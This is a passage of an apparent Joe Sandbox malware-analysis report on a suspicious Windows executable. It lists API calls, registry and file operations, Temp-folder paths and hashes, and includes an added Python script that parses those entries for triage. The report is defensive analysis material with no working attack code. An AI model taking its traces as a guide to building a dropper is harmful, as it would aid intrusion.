• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes,?,00000000,000000F0), ref: 00401645
Strings
• C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes, xrefs: 00401638
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes
                                                                                                                                                                                                          • API String ID: 1892508949-2590807967
                                                                                                                                                                                                          • Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                                                                                          • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(?), ref: 00405152
• CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
  • Part of subcall function 00404160: SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00404172
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
• Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
• Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
• Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GlobalFree.KERNEL32(00638EC8), ref: 00401BA7
• GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BB9
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: Call
• API String ID: 3394109436-1824292864
• Opcode ID: e6a2c73912112ff71fc33628da0d13833a7b58db45f4bb66cc56c7521ba72712
• Instruction ID: 7a614025040163c027adcf1a42aafa75fa428ef26c0d2b57b4045ab01fe90682
• Opcode Fuzzy Hash: e6a2c73912112ff71fc33628da0d13833a7b58db45f4bb66cc56c7521ba72712
• Instruction Fuzzy Hash: 66219072A40100EBDB20EFA4CE85E5F77AAAF45324B25453BF106B32D1DA78A8518B5D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GlobalSize.KERNEL32(00000000), ref: 100010AA
• GlobalAlloc.KERNEL32(00000040,00000000), ref: 100010B9
• GlobalFree.KERNEL32(00000000), ref: 100010D6
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Global$AllocFreeSize
• String ID:
• API String ID: 465308736-0
• Opcode ID: 5aa5a656087daa40f777e4f1ed1206b7320d07011ea3681182fea69699b670d0
• Instruction ID: f516a1bc6a14b8156c531ece61ee701a379590ab2ffb65a9b287619e966faa5a
• Opcode Fuzzy Hash: 5aa5a656087daa40f777e4f1ed1206b7320d07011ea3681182fea69699b670d0
• Instruction Fuzzy Hash: 2B012476800711A7F711EBB5AC859CB77ECEF882E07018026FA08C720AEFB0E9404B61
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000470,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Enum$CloseOpenValue
• String ID:
• API String ID: 167947723-0
• Opcode ID: 92ab2df8331217a59a17599f40ffe36fb639f1bdbb8a7e9334f9d6b9ff154f8a
• Instruction ID: f1a23a851f53a7f1557dfd10c54e6723b1dbb9afb6220ffeee8eb14207b379e7
• Instruction Fuzzy Hash: 2BF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNELBASE(00000000), ref: 10002963
• GetLastError.KERNEL32 ref: 10002A6A
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CreateErrorFileLast
• String ID:
• API String ID: 1214770103-0
• Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
• Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
• Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000470,00000000,00000022,00000000,?,?), ref: 00402CF1
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 72679c68904c0da51367ebbef88f38aa05796d10a352d8d827880ed32402d475
• Instruction ID: 9e7747ffe68dd38d2e91679843896ff1bba49b3e2177530597f16d8d521728a9
• Instruction Fuzzy Hash: 47119E31911205EBEB10CFA0CA489AEB7B4EF44354B20843FE046B72C0DAB89A41EB19
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
• Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
• Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
• GetProcAddress.KERNEL32(00000000,?), ref: 00406457
  • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
  • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
  • Part of subcall function 004063BA: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
• Instruction ID: 08b0c8f2ef2dcefd2b61a20e7fd6ba3d75d00ffdaa245a95e4079d340ab3ded5
• Instruction Fuzzy Hash: D2E0863260462056D25197745E4493773AD9E99744302043EFA46F2080DB789C329B6E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C29
• CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C4B
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                          • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                                                                                          • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
• Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
• Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
• Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
• GetLastError.KERNEL32 ref: 0040570F
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
• Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
• Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
• Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
  • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: FilePointerwsprintf
• String ID:
• API String ID: 327478801-0
• Opcode ID: 1f4eb151cda913b169ffb88545351cdbaf4989d3d31845bb092f08ab334f10a1
• Instruction ID: 961aab187d6e804d52bb1e41e5d93eaf0119f522ae0a1b5a30e902dd9b89f162
• Opcode Fuzzy Hash: 1f4eb151cda913b169ffb88545351cdbaf4989d3d31845bb092f08ab334f10a1
• Instruction Fuzzy Hash: BCE04871601514EFDB01AF959E49DAF7769DB40328B14043BF501F00E1CA7D8C419E2D
Uniqueness
Uniqueness Score: -1.00%
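The "APIs" bullets are the part of these function entries a triager actually reads, and a full report carries thousands of them in this exact shape. The Python below is an added example, not Joe Sandbox's code and not part of this report: it parses those bullets into records (API name, exporting module, argument list, the call-site address given after "ref:", and, for the indented "Part of subcall function" bullets, the nested function's address), groups them per entry and pulls out any argument that looks like a Windows path. The sample input is constructed by copying the API lines of the five entries in this section; arguments the report prints as "?" are kept verbatim. The api_signature helper joins an entry's sorted API names with "|"; that is a grouping convention chosen here, not the report's own "API ID" or "API String ID", whose derivation this page does not document.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the "APIs" bullets copied from the five function
# entries in this report section (a raw string, so the backslashes are literal).
SAMPLE = r"""
APIs
• GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C29
• CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C4B
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
• GetLastError.KERNEL32 ref: 0040570F
APIs
• SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
  • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
APIs
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
"""

# One bullet: optional "Part of subcall function <addr>:" prefix, Api.MODULE,
# optional "(args)", then "ref: <addr>" (the comma before "ref:" is absent when
# the bullet has no argument list, as in the GetLastError line).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class ApiCall:
    entry: int                 # index of the "APIs" block (one block per analysed function)
    api: str
    module: str
    args: List[str]            # argument text as printed; "?" is what the report shows for unresolved values
    ref: int                   # call-site address inside the dumped image
    subcall_of: Optional[int]  # nested function address for "Part of subcall" bullets, else None


def split_args(raw: str) -> List[str]:
    """Split on commas, but not inside double quotes (a quoted path may contain commas)."""
    if raw == "":
        return []
    out, cur, quoted = [], [], False
    for ch in raw:
        if ch == '"':
            quoted = not quoted
        elif ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
            continue
        cur.append(ch)
    out.append("".join(cur))
    return out


def parse_api_calls(text: str) -> List[ApiCall]:
    """Turn the report's API bullets into ApiCall records; entries are numbered from 0."""
    calls: List[ApiCall] = []
    entry = -1
    for line in text.splitlines():
        if line.strip() == "APIs":
            entry += 1
            continue
        m = CALL_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append(ApiCall(
            entry=entry,
            api=m.group("api"),
            module=m.group("mod"),
            args=[a.strip('"') for a in split_args(args if args is not None else "")],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def api_signature(calls: List[ApiCall], entry: int) -> str:
    """Sorted, de-duplicated API names of one entry joined with '|'.
    A grouping convention chosen for this example, not the report's 'API ID'."""
    return "|".join(sorted({c.api for c in calls if c.entry == entry}))


def referenced_paths(calls: List[ApiCall]) -> List[str]:
    """Every argument that looks like a Windows drive path, de-duplicated and sorted."""
    return sorted({a for c in calls for a in c.args if WIN_PATH_RE.match(a)})


if __name__ == "__main__":
    parsed = parse_api_calls(SAMPLE)
    for c in parsed:
        nested = f" (subcall of {c.subcall_of:08X})" if c.subcall_of is not None else ""
        print(f"entry {c.entry} {c.ref:08X} {c.api}.{c.module} args={len(c.args)}{nested}")
    for n in range(max(c.entry for c in parsed) + 1):
        print(f"entry {n}: {api_signature(parsed, n)}")
    print("paths:", referenced_paths(parsed))
```

Run it against the whole report text rather than the sample and the entry signatures give a quick way to spot the file-drop and INI-write functions among the hundreds of entries, while referenced_paths collects the on-disk locations the sample touched without reading every bullet.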

APIs
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                          • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                                                                          • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000470,00000000,00000022,00000000,?,?), ref: 00402CF1
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
